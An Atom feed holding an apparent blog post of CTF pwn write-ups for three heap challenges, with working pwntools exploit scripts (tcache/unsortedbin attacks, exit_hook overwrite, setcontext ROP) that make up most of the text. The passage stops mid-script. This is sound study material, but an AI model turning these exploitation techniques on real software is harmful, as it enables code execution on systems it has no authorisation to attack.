<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title></title>
<link href="https://brooke-hub.github.io/atom.xml" rel="self"/>
<link href="https://brooke-hub.github.io/"/>
<updated>2021-09-27T04:20:57.098Z</updated>
<id>https://brooke-hub.github.io/</id>
<author>
<name>WendyJellyBeans</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Reproducing recent competition challenges</title>
<link href="https://brooke-hub.github.io/2021/09/26/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/"/>
<id>https://brooke-hub.github.io/2021/09/26/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/</id>
<published>2021-09-26T03:31:16.000Z</published>
<updated>2021-09-27T04:20:57.098Z</updated>
<content type="html"><![CDATA[<blockquote><p>I've been slacking off all holiday. The challenges in the last few competitions were all fairly standard, so I'm taking the chance to review heap and stack exploitation techniques.</p></blockquote><span id="more"></span><h1 id="长城杯"><a href="#长城杯" class="headerlink" title="长城杯"></a>长城杯 (Great Wall Cup)</h1><h2 id="K1ng-in-h3Ap-I"><a href="#K1ng-in-h3Ap-I" class="headerlink" title="K1ng_in_h3Ap_I"></a>K1ng_in_h3Ap_I</h2><p>We're given the low 3 bytes of an address, and there's a UAF and an off-by-null; try overwriting a hook directly without leaking the full libc.</p><p>The UAF alone is enough.</p><p>Neither malloc_hook nor free_hook holds an address, but exit_hook holds a libc address.</p><p>So try a fastbin attack on exit_hook to write a one_gadget.</p><p>But the fastbin attack checks the chunk size.</p><p>Looking at the memory before exit_hook, there's no usable data, so the only option is an unsortedbin attack to write a large number (the main_arena address) as a fake chunk size.</p><p>Once that's done, letting the program run to exit(0) triggers the one_gadget.</p><p><img src="/2021/09/26/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20210926152513300.png" alt="image-20210926152513300"></p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p &_rtld_global._dl_rtld_lock_recursive</span><br><span class="line"><span class="variable">$4</span> = (void (**)(void *)) <span class="number">0</span>x7f83ffbf7f48 <_rtld_global+<span class="number">3848</span>></span><br><span class="line"></span><br><span class="line">pwndbg> x/<span class="number">10</span>a <span class="number">0</span>x7f83ffbf7f48</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f48 <_rtld_global+<span class="number">3848</span>>:<span class="number">0</span>x7f83ff9d1c90 <rtld_lock_default_lock_recursive><span class="number">0</span>x7f83ff9d1ca0 <rtld_lock_default_unlock_recursive></span><br><span class="line"><span class="number">0</span>x7f83ffbf7f58 <_rtld_global+<span class="number">3864</span>>:<span class="number">0</span>x7f83ff9e50e0 <__GI__dl_make_stack_executable><span 
class="number">0</span>x6</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f68 <_rtld_global+<span class="number">3880</span>>:<span class="number">0</span>x1<span class="number">0</span>x7f83ffbf5928</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f78 <_rtld_global+<span class="number">3896</span>>:<span class="number">0</span>x1<span class="number">0</span>x1000</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f88 <_rtld_global+<span class="number">3912</span>>:<span class="number">0</span>x78<span class="number">0</span>x40</span><br></pre></td></tr></table></figure><p>Earlier I was thinking about how to get a chunk whose fd holds an unsortedbin address into the fastbin, and even used the off-by-null to do a heap consolidation (I really do love heap consolidation).</p><p>But after it was freed into the fastbin, the size no longer matched.</p><p>Just carve a chunk of matching size off the unsorted chunk, use the UAF to change the last byte of the fast chunk's fd, and link it into the fastbin.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 
class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span 
class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"></span><br><span class="line">libc=ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">">>"</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span 
class="string">'index:'</span>,<span class="built_in">str</span>(index)) <span class="comment">#0-10</span></span><br><span class="line"> sla(<span class="string">'input size:'</span>,<span class="built_in">str</span>(size)) <span class="comment"># <=0xf0</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sa(<span class="string">'input context:'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gift</span>():</span></span><br><span class="line"> menu(<span class="number">666</span>)</span><br><span class="line"></span><br><span class="line">gift()</span><br><span class="line">sh.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line">exit_hook = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>) + <span class="number">0x59b738</span> <span class="comment">#exit_hook</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x88</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x68</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x60</span>)</span><br><span 
class="line">add(<span class="number">3</span>,<span class="number">0x88</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x90</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x90</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x60</span>) <span class="comment"># trim from unsortedbin</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># link chunk5 to tcache</span></span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">dele(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">2</span>,<span class="string">'\x00'</span>+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># #unsortedbin attack write a big num to be fake chunk size</span></span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x80</span>) <span class="comment">#clear unsortedbin</span></span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line">target=exit_hook-<span class="number">0x30</span></span><br><span class="line">edit(<span class="number">4</span>,p64(<span class="number">0</span>)+p8(target&<span class="number">0xff</span>)+p8((target&<span class="number">0xffff</span>) >> <span class="number">8</span>)+p8((target&<span class="number">0xffffff</span>) >> <span class="number">16</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x90</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment"># tcache attack </span></span><br><span class="line">target=exit_hook-<span 
class="number">0x23</span></span><br><span class="line">edit(<span class="number">5</span>,p8(target&<span class="number">0xff</span>)+p8((target&<span class="number">0xffff</span>) >> <span class="number">8</span>)+p8((target&<span class="number">0xffffff</span>) >> <span class="number">16</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">leak(<span class="string">'exit_hook'</span>,exit_hook)</span><br><span class="line">one=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"><span class="comment"># system = exit_hook - 0x5abba8</span></span><br><span class="line"><span class="comment"># leak('system',system)</span></span><br><span class="line">leak(<span class="string">'one'</span>,one[<span class="number">3</span>])</span><br><span class="line">target=exit_hook - <span class="number">0x4ffd01</span></span><br><span class="line">edit(<span class="number">8</span>,<span class="string">'\x00'</span>*<span class="number">0x13</span>+p8(target&<span class="number">0xff</span>)+p8((target&<span class="number">0xffff</span>) >> <span class="number">8</span>)+p8((target&<span class="number">0xffffff</span>) >> <span class="number">16</span>)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">menu(<span class="number">1</span>)</span><br><span class="line">sla(<span class="string">'index:'</span>,<span class="built_in">str</span>(<span class="number">11</span>)) <span class="comment">#0-10</span></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span 
class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="K1ng-in-h3Ap-II"><a href="#K1ng-in-h3Ap-II" class="headerlink" title="K1ng_in_h3Ap_II"></a>K1ng_in_h3Ap_II</h1><p>The UAF gives an arbitrary address write.</p><p>srop+orw_rop</p><p>Because of the size limit I replaced write with puts. While debugging I could see the flag contents had already been read into memory, but at the end it seemed to print out an address instead, so the puts argument was probably a bit off. I'll look again tomorrow; I'm starving and want to go eat.</p><p>I'm back and took another look: the puts argument was fine. To save effort I had used the same address both for the "flag\x00" string and for the flag file contents; storing them separately fixed it.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span 
class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span 
class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="comment"># context.log_level='debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"></span><br><span class="line">libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>,checksec=<span 
class="literal">False</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">">>"</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'index:'</span>,<span class="built_in">str</span>(index)) <span class="comment">#0-15</span></span><br><span class="line"> sla(<span class="string">'input size:'</span>,<span class="built_in">str</span>(size)) <span class="comment"># <=0x60</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span 
class="built_in">str</span>(index))</span><br><span class="line"> sa(<span class="string">'input context:'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> menu(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x50</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x50</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x30</span>)</span><br><span class="line"><span class="comment"># add(6,0x30)</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">tcache_head = u64(ru(<span class="string">'\x55'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0xf30</span></span><br><span class="line">leak(<span class="string">'tcache_head'</span>,tcache_head)</span><br><span class="line"></span><br><span class="line">sla(<span class="string">">>"</span>,<span 
class="string">'1'</span>*<span class="number">0x420</span>)</span><br><span class="line">target=tcache_head+<span class="number">0x750</span></span><br><span class="line">leak(<span class="string">'target'</span>,target)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">1</span>,p64(target+<span class="number">0x10</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x50</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>)</span><br><span class="line">show(<span class="number">3</span>)</span><br><span class="line">libc_base = u64(ru(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) -<span class="number">0x3ebcb0</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">__free_hook = libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">setcontext_35=libc_base+libc.sym[<span class="string">'setcontext'</span>] + <span class="number">0x35</span></span><br><span class="line"><span class="comment"># mov rsp, [rdi+0A0h]</span></span><br><span class="line"><span class="comment"># ......</span></span><br><span class="line"><span class="comment"># mov rcx, [rdi+0A8h]</span></span><br><span class="line"><span class="comment"># push rcx</span></span><br><span class="line"><span class="comment"># ......</span></span><br><span class="line"><span class="comment"># retn</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line">edit(<span class="number">5</span>,p64(__free_hook)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">6</span>,<span 
class="number">0x30</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x30</span>)</span><br><span class="line"><span class="comment"># edit(7,p64(setcontext_35)+'\n')</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#=====================================================write orw_rop </span></span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x30</span>)</span><br><span class="line"><span class="comment"># add(0,0x10)</span></span><br><span class="line"><span class="comment"># edit(0,'clag'.ljust(8,'\x00'))</span></span><br><span class="line"><span class="comment"># flag_addr= tcache_head +0x870</span></span><br><span class="line"></span><br><span class="line">pop_rdi=libc_base+<span class="number">0x00000000000215bf</span></span><br><span class="line">pop_rsi=libc_base+<span class="number">0x0000000000023eea</span></span><br><span class="line">pop_rdx=libc_base+<span class="number">0x0000000000001b96</span></span><br><span class="line">flag_addr=tcache_head+<span class="number">0x780</span> <span class="comment"># orw 1</span></span><br><span class="line">orw_addr = tcache_head+<span class="number">0x780</span></span><br><span class="line">orw_rop=<span class="string">'flag'</span>.ljust(<span class="number">0x10</span>,<span class="string">'\x00'</span>)</span><br><span class="line">orw_rop += p64(pop_rdi) + p64(flag_addr)</span><br><span class="line">orw_rop += p64(pop_rsi) + p64(<span class="number">0</span>)</span><br><span class="line">orw_rop += p64(libc_base+libc.sym[<span class="string">'open'</span>])</span><br><span class="line">orw_rop += p64(pop_rdi) + p64(<span class="number">3</span>)</span><br><span class="line">orw_rop += p64(pop_rsi) + 
p64(tcache_head+<span class="number">0x440</span>)</span><br><span class="line">orw_rop += p64(pop_rdx) + p64(<span class="number">0x50</span>)</span><br><span class="line"></span><br><span class="line">orw_rop += p64(libc_base+libc.sym[<span class="string">'read'</span>])</span><br><span class="line">orw_rop += p64(pop_rdi) + p64(tcache_head+<span class="number">0x440</span>)</span><br><span class="line">orw_rop += p64(libc_base+libc.sym[<span class="string">'puts'</span>])</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">len</span>(orw_rop)</span><br><span class="line">edit(<span class="number">8</span>,orw_rop[:<span class="number">0x60</span>])</span><br><span class="line">orw_last = tcache_head+<span class="number">0x7e0</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">9</span>)</span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line">edit(<span class="number">10</span>,p64(orw_last)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x30</span>)</span><br><span class="line">edit(<span class="number">9</span>,orw_rop[<span class="number">0x60</span>:])</span><br><span class="line"><span class="comment">#===============================================================</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#==================================set rdi</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x40</span>)<span class="comment">#clear</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x40</span>)<span class="comment">#rdi</span></span><br><span class="line">edit(<span class="number">0</span>,<span 
class="string">'\x00'</span>*<span class="number">0x40</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x40</span>)<span class="comment">#rdi+0x50</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">'\x00'</span>*<span class="number">0x40</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x40</span>)<span class="comment">#rdi+0xa0 </span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">'\x00'</span>*<span class="number">0x40</span>)</span><br><span class="line"></span><br><span class="line">chunk1=tcache_head + <span class="number">0x1190</span></span><br><span class="line">edit(<span class="number">0</span>,p64(chunk1)+<span class="string">'\n'</span>)</span><br><span class="line">retn=libc_base+<span class="number">0x00000000000008aa</span></span><br><span class="line">edit(<span class="number">1</span>,p64(orw_addr+<span class="number">0x10</span>)+p64(retn)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =================================__free_hook to gadget</span></span><br><span class="line">edit(<span class="number">7</span>,p64(setcontext_35)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ==================================triger</span></span><br><span class="line">leak(<span class="string">'setcontext_35'</span>,setcontext_35)</span><br><span class="line">leak(<span class="string">'orw_addr'</span>,orw_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="长安杯"><a href="#长安杯" 
class="headerlink" title="Chang'an Cup"></a>Chang'an Cup</h1><h2 id="baigei"><a href="#baigei" class="headerlink" title="baigei"></a>baigei</h2><p>In add, size is a signed int, so -1 can be passed in and stored in sz_list; the comparison in edit casts it to unsigned, which gives an overflow of arbitrarily many bytes.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span 
class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'node4.buuoj.cn'</span>, <span class="number">25603</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./main"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># libc=ELF('libc.so.6')</span></span><br><span class="line">libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">elf=ELF(<span class="string">'./main'</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : 
sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">cmd</span>):</span></span><br><span class="line"> sla(<span class="string">'>>'</span>,<span class="built_in">str</span>(cmd))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">idx,size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx)) <span class="comment">#<=15</span></span><br><span class="line"> sla(<span class="string">'size?'</span>,<span class="built_in">str</span>(size)) <span class="comment">#<=0x400</span></span><br><span 